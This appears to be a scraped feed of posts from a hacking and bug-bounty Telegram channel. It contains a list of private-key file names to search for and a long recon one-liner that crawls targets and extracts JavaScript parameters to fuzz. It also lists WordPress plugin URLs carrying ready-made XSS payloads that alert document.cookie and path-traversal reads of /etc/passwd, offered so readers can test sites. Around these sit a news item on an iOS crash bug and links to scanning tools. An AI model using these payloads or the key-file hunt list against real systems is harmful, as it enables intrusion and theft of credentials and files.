minikube.pem
test_key.pem
test_rsa_privkey.pem
test_rsa_privkey_encrypted.pem
rsakey.pem
key.pem
certificate.pem
private_key.pem
public_key.pem
privkey.pem
dhparams.pem
ios_push_certificate.pem
keycert.passwd.pem
ca1-key.pem
key-certbot.pem
key2048.pem
private.pem
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤5👏4🔥2
⚡️Command for Hidden JS Parameter Discovery.
This command takes your recon game to the next level!⚡️
cat subs.txt | (gau --threads 20 --blacklist jpg,jpeg,gif,png,tiff,ttf,otf,woff,woff2,ico,noscript,pdf,txt,mp4,avi,mov,mkv,exe,zip,tar,gz,rar,7z hakrawler --depth 5 --plain --insecure waybackurls || katana -d 5 --js-crawl --auto-redirect --extensions js,json,php,aspx,asp,jsp,html,htm --proxy http://127.0.0.1:8080 ) | sort -u | httpx --silent --threads 200 --status-code --noscript --tech-detect --content-length --server | tee -a httpx_full.txt | grep -Eiv '\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|noscript|txt|pdf|mp4|avi|mov|mkv|exe|zip|tar|gz|rar|7z|css|doc|docx|xls|xlsx|ppt|pptx)$' | while read url; do vars=$(curl -sL $url | grep -Eo "(var |let |const |function |class |import |export )[a-zA-Z0-9_]+" | sed -e 's, "$url"', -e 's/\(var \|let \|const \|function \|class \|import \|export \)//g' | grep -Eiv '\.js$|\. [a-zA-Z0-9]+\.[a-zA-Z0-9]+$' | sed 's/$/= $FUZZ /'); echo -e "\e[1;33m$url\e[1;32m$vars"; done | tee -a js_parameters.txt
This command takes your recon game to the next level!⚡️
❤18👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - lauritzh/domscan: Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects. - lauritzh/domscan
👍1
check this if you have these plugin.
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&NAME=NAME%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/noscript_az.php?noscript_az=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍5❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
A security researcher recently found that there was a bug in iOS that could lead the iPhone to crash when certain characters were typed in a sequence. If users typed “”::” followed by any fourth character into Spotlight Search or App Library could either the phone to either freeze or reboot.
https://www.thehindu.com/sci-tech/technology/new-ios-bug-causes-apple-iphone-to-crash-if-a-certain-sequence-of-characters-are-typed/article68553248.ece/amp/
The Hindu
New iOS bug causes Apple iPhone to crash if a certain sequence of characters are typed
A new bug in iOS can cause the iPhone to crash if four characters are typed in a specific sequence.
What Resources You're Looking For. Do Drop A Comment! (We Don't Share Pirated Contents)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡1👍1
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
👍5
Brut Security pinned «https://cyfare.net/ - ExploitDB - Exploits, Shellcodes, Dorks - Malware Query Engine - Download, Search, Hunt & Intel - Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox»
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud. - initstring/cloud_enum
👏1